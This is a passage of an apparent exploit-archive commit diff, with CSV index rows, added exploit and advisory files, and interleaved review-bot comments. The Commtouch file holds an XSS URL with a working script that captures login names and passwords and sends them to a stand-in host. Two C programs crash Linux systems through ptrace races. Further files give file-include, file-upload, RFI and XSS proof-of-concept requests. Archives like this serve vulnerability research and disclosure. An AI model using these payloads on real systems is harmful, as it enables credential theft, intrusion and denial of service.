Updated 03_01_2014

Offensive Security 2014-03-01 04:27:47 +00:00
parent 0007ea1915
commit 37e7d441f8
24 changed files with 883 additions and 1 deletions


@ -28664,7 +28664,7 @@ id,file,description,date,author,platform,type,port
31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - (.PNM File) Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,@sha0coder,linux,remote,0
31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0
31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
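Review bot: the two rows for id 31875 (Python socket.recvfrom_into()) are identical except for the author field, `@sha0coder` versus `Sha0`; the rendering has dropped the +/- markers, so it is not visible which value this commit keeps, and the csv must end up with exactly one row for 31875. Pick one author form and confirm the other row is the one being removed.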
@ -28684,8 +28684,10 @@ id,file,description,date,author,platform,type,port
31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0
31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0
31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80
31895,platforms/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow",2014-02-25,tishion,windows,local,0
31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080
31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80
31899,platforms/windows/dos/31899.txt,"VLC 2.1.3 - (.avs file) Crash PoC",2014-02-25,kw4,windows,dos,0
31900,platforms/hardware/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,hardware,webapps,0
31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 - 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0
31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0
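Review bot: the port column is inconsistent across the new iOS hardware/webapps rows: 31896 (WiFiles HD) records 8080 while 31900 (Private Camera Pro), from the same author and of the same type, records 0. Confirm the listening port for 31900 or record both the same way, since the port field is what readers filter on.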
@ -28697,6 +28699,8 @@ id,file,description,date,author,platform,type,port
31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0
31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0
31914,platforms/windows/dos/31914.pl,"GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
31916,platforms/php/webapps/31916.txt,"Piwigo 2.6.1 - CSRF Vulnerability",2014-02-26,killall-9,php,webapps,80
31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,metasploit,windows,remote,9090
@ -28730,3 +28734,22 @@ id,file,description,date,author,platform,type,port
31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31947,platforms/php/webapps/31947.txt,"EXP Shop 1.0 Joomla! 'com_expshop' Component SQL Injection Vulnerability",2008-06-22,His0k4,php,webapps,0
31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 Remote File Include Vulnerability",2008-06-22,CraCkEr,php,webapps,0
31949,platforms/php/webapps/31949.txt,"Chipmunk Blog members.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31950,platforms/php/webapps/31950.txt,"Chipmunk Blog comments.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31951,platforms/php/webapps/31951.txt,"Chipmunk Blog photos.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31952,platforms/php/webapps/31952.txt,"Chipmunk Blog archive.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31953,platforms/php/webapps/31953.txt,"Chipmunk Blog cat.php membername Parameter XSS",2008-06-23,sl4xUz,php,webapps,0
31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 /admin/admin_edit_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 /admin/admin_new_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 /admin/admin_edit_topmenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
31959,platforms/linux/local/31959.txt,"Perl 'rmtree()' Function Local Insecure Permissions Vulnerability",2008-06-23,"Frans Pop",linux,local,0
31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80
31962,platforms/hardware/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,hardware,webapps,8080
31963,platforms/php/webapps/31963.txt,"E-topbiz Link ADS 1 'out.php' SQL Injection Vulnerability",2008-06-24,"Hussin X",php,webapps,0
31964,platforms/windows/dos/31964.txt,"5th street 'dx8render.dll' Format String Vulnerability",2008-06-25,superkhung,windows,dos,0
31965,platforms/linux/dos/31965.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31966,platforms/linux/dos/31966.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0
31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
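Review bot: the 2008-dated rows added here (31945 to 31960 and 31963 to 31968) drop the ` - ` separator between product and issue that the other rows in this hunk and the rest of the file use (compare `PEGames Multiple Cross Site Scripting Vulnerabilities` with `GDL 4.2 - Multiple Vulnerabilities`), and they mix `Cross Site Scripting` (31945) with `Cross-Site Scripting` (31967). Normalise to `Product Version - Issue` and one spelling so searches over the csv match.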


platforms/asp/webapps/31967.txt Executable file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/29957/info
Commtouch Anti-Spam Enterprise Gateway is prone to a cross-site scripting vulnerability because the device fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Commtouch Anti-Spam Enterprise Gateway 4 and 5 are vulnerable; other versions may also be affected.
http://www.example.com/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function
SendCredentials(){ img = new Image();
img.src="http://www.example2.com/stealer/?userid=" +
document.forms[0].LoginName.value + "&amp;password=" +
document.forms[0].LoginPass.value;} function HandleSubmit(){
document.forms[0].onsubmit= SendCredentials; } window.onload =
HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x
http://www.example.com/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD
</SCRIPT><input%20type="hidden"%20name="XXX"%20value="X
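Review bot: the first PoC URL goes further than demonstrating reflection in `PARAMS`: it carries a complete credential-capturing script (`SendCredentials`, which sends `LoginName` and `LoginPass` to example2.com), while the second URL with the generic `PAYLOAD` marker already proves the injection point. Keep only the generic form; the file should document the injection, not ship a phishing payload. Both URLs are also wrapped across several lines, and the file should say that the line breaks are wrapping and not part of the request.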


@ -0,0 +1,271 @@
Document Title:
===============
Bluetooth Photo Share Pro v2.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1218
Release Date:
=============
2014-02-27
Vulnerability Laboratory ID (VL-ID):
====================================
1218
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
This is the best bluetooth sharing and file transfer app in app store. Transfer photos, videos, music,
contacts and any file between two iPhone,iPad and/or iPod Touches over bluetooth connection. Requires
iPhone 3G or later or 2nd generation iPod Touch or later . Does not require any 3G or WiFi connection.
(Copy of the Homepage: https://itunes.apple.com/us/app/bluetooth-photo-video-music/id590196698 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Bluetooth Photo/Video/Music/Contact Share Pro v2.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-02-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Bluetooth Photo Share - iOS Mobile Web Application 2.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the officialBluetooth Photo/Video/Music/Contact Share Pro v2.0 iOS mobile application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Select File to Upload` function POST method request. Remote attackers are
able to inject own files with malicious `filename` to compromise the mobile application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main index file dir list of the path section after the regular upload.
The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system)
count of 7.4(+)|(-)7.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the officialBluetooth Photo/Video/Music/Contact Share Pro v2.0 iOS mobile application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `upload` (video and images) module. Remote attackers are able to upload a php or js web-shells by renaming
the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name
and extension `image.gif.jpg.html.js.aspx.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg &
.gif file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.1(+)|(-)6.2.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir List (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.
PoC: filename
<table id="filetable" cellpadding="0" cellspacing="0" width="860px">
<thead><tr><th class="file">File Name</th><th style="padding-left:15px">File Size</th><th class="actionbutton"></th><th class="actionbutton"></th></tr></thead>
<tbody id="filelist" style="padding-left:15px;">
<tr><td class="file"><a href="/files/[LOCAL FILE INCLUDE WEB VULNERABILITY!]" class="file"><./[LOCAL FILE INCLUDE WEB VULNERABILITY!]"></a></td>
<td class='info'>23.81K</td><td class='actionbutton' >
<form><input type='button' value='Download' onClick="window.location.href='/files/[LOCAL FILE INCLUDE WEB VULNERABILITY!]'"></form></td><td class='actionbutton' >
<form action='/files/[LOCAL FILE INCLUDE WEB VULNERABILITY!]' method='post' ><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit"
value="Delete" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr></tbody></table>
--- PoC Session Logs [POST] ---
20:31:19.936[165ms][total 165ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------10162615616712
Content-Disposition: form-data; name="newfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY]<"
Content-Type: image/jpeg
20:31:21.700[156ms][total 222ms] Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[61465] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[61465]
Date[Mi., 26 Feb. 2014 19:40:03 GMT]
20:31:22.980[46ms][total 46ms] Status: 404[Not Found]
GET http://localhost:8080/a Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Mi., 26 Feb. 2014 19:40:04 GMT]
1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.
PoC: filename as path
http://localhost:8080/files/[ARBITRARY FILE UPLOAD VULNERABILITY!]"
--- PoC Session Logs [POST] ---
20:31:19.936[165ms][total 165ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------10162615616712
Content-Disposition: form-data; name="newfile"; filename="./[ARBITRARY FILE UPLOAD VULNERABILITY!].jpeg.gif.php.js.aspx.gif.jpeg<"
Content-Type: image/jpeg
Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
1.2
The second vulnerability can be patched by a secure restriction of the filename value user input in the upload POST method request.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
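Review bot: the header's CVSS value (6.7) matches neither score in the body (7.4/7.5 for issue 1.1, 6.1/6.2 for 1.2), and a single `Severity Level: High` is given for two issues the text itself rates differently (`high(+)` versus `high(-)`); list one score per issue. The 1.2 session log repeats the 1.1 log byte for byte (same timestamps 20:31:19.936, same boundary `10162615616712`) with only the filename changed, so it does not document a separate upload; capture it again or drop it. The fix text is too vague to act on: `secure parse and encode of the vulnerable filename value` should say that the server must strip path components from the multipart `filename`, allowlist extensions before writing, and HTML-encode the stored name when it is rendered in the index listing. Minor: `officialBluetooth` is missing a space in both 1.1 and 1.2, `occcurs` in 1.1, `Affected Product(s)` names the store rather than the app, and the log labels are mis-encoded (`Gr??e des Inhalts`, `Copyright ?`).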

platforms/linux/dos/31965.c Executable file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
#include <stdlib.h>
#include <sys/ptrace.h>
int main(int argc, char *argv[])
{
pid_t pid = atoi(argv[1]);
while (1)
ptrace(PTRACE_ATTACH, pid, NULL, NULL);
return 0;
}
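Review bot: `atoi(argv[1])` at the top of `main` dereferences `argv[1]` without checking `argc`, so running the program with no argument is undefined behaviour rather than a usage error; test `argc < 2` and exit with a message first. `pid_t` should come from `<sys/types.h>` rather than relying on `<sys/ptrace.h>` to pull it in. The intro text speaks of a race condition, but nothing in these twenty lines shows one; a sentence on how this file differs from 31966.c (same source BID) would help readers choose between the two.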

platforms/linux/dos/31966.c Executable file

@ -0,0 +1,102 @@
source: http://www.securityfocus.com/bid/29945/info
The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.
Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users.
/* This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any
damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute
it
freely. */
#ifdef __ia64__
#define ia64_fpreg ia64_fpreg_DISABLE
#define pt_all_user_regs pt_all_user_regs_DISABLE
#endif /* __ia64__ */
#include <sys/ptrace.h>
#ifdef __ia64__
#undef ia64_fpreg
#undef pt_all_user_regs
#endif /* __ia64__ */
#include <linux/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#if defined __i386__ || defined __x86_64__
#include <sys/debugreg.h>
#endif
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
/* WARNING: The real testing count is probably unbound. */
#define DEFAULT_TESTTIME 10 /* seconds */
static pid_t pid;
static void
cleanup (void)
{
if (pid != 0)
kill (pid, SIGKILL);
}
static void
handler_fail (int signo)
{
cleanup ();
signal (signo, SIG_DFL);
raise (signo);
}
static void *thread_func(void *argv0_pointer)
{
execl("/proc/self/exe", argv0_pointer, "child", NULL);
abort ();
/* NOTREACHED */
}
int main(int argc, const char *argv[])
{
char *testtime = getenv ("TESTTIME");
time_t testend = time (NULL) + (testtime != NULL ? atoi
(testtime)
:
DEFAULT_TESTTIME);
unsigned long loops;
pthread_t thread;
atexit (cleanup);
signal (SIGABRT, handler_fail);
signal (SIGINT, handler_fail);
if ((argc != 2 || strcmp (argv[1], "child") != 0) && (pid =
fork())) {
loops = 0;
do {
ptrace(PTRACE_ATTACH, pid, NULL, 0);
ptrace(PTRACE_DETACH, pid, NULL, 0);
loops++;
} while (time (NULL) < testend);
return 0;
}
if (pthread_create(&thread, NULL, thread_func, (void *)
argv[0]))
perror("pthread_create");
while (1)
pause();
/* NOTREACHED */
abort ();
}
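Review bot: `time()` and `time_t` are used in `main` but `<time.h>` is never included, so a compiler that rejects implicit declarations fails the build (`<sys/types.h>` supplies `time_t` but not the `time` prototype). The `pthread_create` failure path only calls `perror` and then falls into `while (1) pause();`, so a failed thread start hangs silently instead of exiting non-zero; return after the `perror`. `(void *) argv[0]` also casts away `const`. The source is visibly wrapped at mail-line width (`atoi\n(testtime)\n:`, `pid =\nfork())`, `(void *)\nargv[0]`); the tokens still compile, but the licence comment (`damages\narising`) and these expressions should be rejoined so the file reads as the author wrote it.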

platforms/linux/dos/31968.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29958/info
GNOME Rhythmbox is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.
Exploiting this issue allows remote attackers to crash the application and trigger denial-of-service conditions, denying further service to legitimate users. Given the nature of this issue, code execution may be possible, but this has not been confirmed.
GNOME Rhythmbox 0.11.5 is vulnerable; other versions may also be affected.
[playlist]
X-GNOME-Title=
Title= A * 1475
NumberOfEntries=0
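Review bot: `Title= A * 1475` is shorthand for a `Title` value of 1475 repeated `A` characters, not the literal text, and the file never says so; a reader who saves the playlist as written gets an input that does not reproduce the crash. State the notation, and that this is a .pls playlist, since the csv row only says `Malformed Playlist File`.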

platforms/linux/local/31959.txt Executable file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/29902/info
Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links.
Attackers can leverage this issue to change the permissions of arbitrary files.
Perl 5.10.0 is vulnerable; other versions may also be affected.
% touch foo
% ln -s foo bar
% ls -l foo bar
lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo
-rw-r--r-- 1 example example 0 2008-06-21 09:06 foo
% perl -e 'use File::Path rmtree; rmtree bar'
% ls -l foo bar
ls: cannot access bar: No such file or directory
-rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo
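Review bot: the transcript shows the issue but never states it: `rmtree bar` follows the symlink `bar` and changes the mode of its target `foo` from `-rw-r--r--` to `-rwxrwxrwx` (the final `ls -l`), which is the `change the permissions of arbitrary files` in the description, while only the symlink itself is removed. One sentence saying that the mode change on the link target is the vulnerability would make the expected output verifiable for someone re-running the steps.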


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29881/info
Open Digital Assets Repository System (ODARS) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
ODARS 1.0.2 is vulnerable; other versions may be affected as well.
http://www.example.com/path/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=[SHELL]


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/members.php?membername=[XSS]
http://www.example.com/path/members.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/comments.php?membername=[XSS]
http://www.example.com/path/comments.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/photos.php?membername=[XSS]
http://www.example.com/path/photos.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/archive.php?membername=[XSS]
http://www.example.com/path/archive.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29883/info
Chipmunk Blog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/cat.php?membername=[XSS]
http://www.example.com/path/cat.php?membername=%22%3E%3Cscript%3Ealert(123);%3C/script%3E
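Review bot: the five Chipmunk Blog files added in this commit (31949 to 31953) share one source (BID 29883) and identical wording, differing only in the script name before `?membername=`; a single file listing the five endpoints, or a cross-reference in each, would keep them from drifting apart when one is corrected. Within each file the second URL only restates the first with the `[XSS]` placeholder filled by the URL-encoded `"><script>alert(123);</script>`; one form per file is enough.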


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29884/info
The 'benja CMS' program is prone to multiple vulnerabilities because it fails to adequately validate input and restrict access. These issues include three cross-site scripting issues, an arbitrary-file-upload issue, and a vulnerability that allows unauthorized access to an administrative script.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to run arbitrary script code in the context of the application, or to access administrative scripts.
These issues affect 'benja CMS 0.1'; other versions may also be affected.
http://www.example.com/[benjacms_path]/admin/admin_edit_submenu.php/<XSS>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29884/info
The 'benja CMS' program is prone to multiple vulnerabilities because it fails to adequately validate input and restrict access. These issues include three cross-site scripting issues, an arbitrary-file-upload issue, and a vulnerability that allows unauthorized access to an administrative script.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to run arbitrary script code in the context of the application, or to access administrative scripts.
These issues affect 'benja CMS 0.1'; other versions may also be affected.
http://www.example.com/[benjacms_path]/admin/admin_new_submenu.php/<XSS>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29884/info
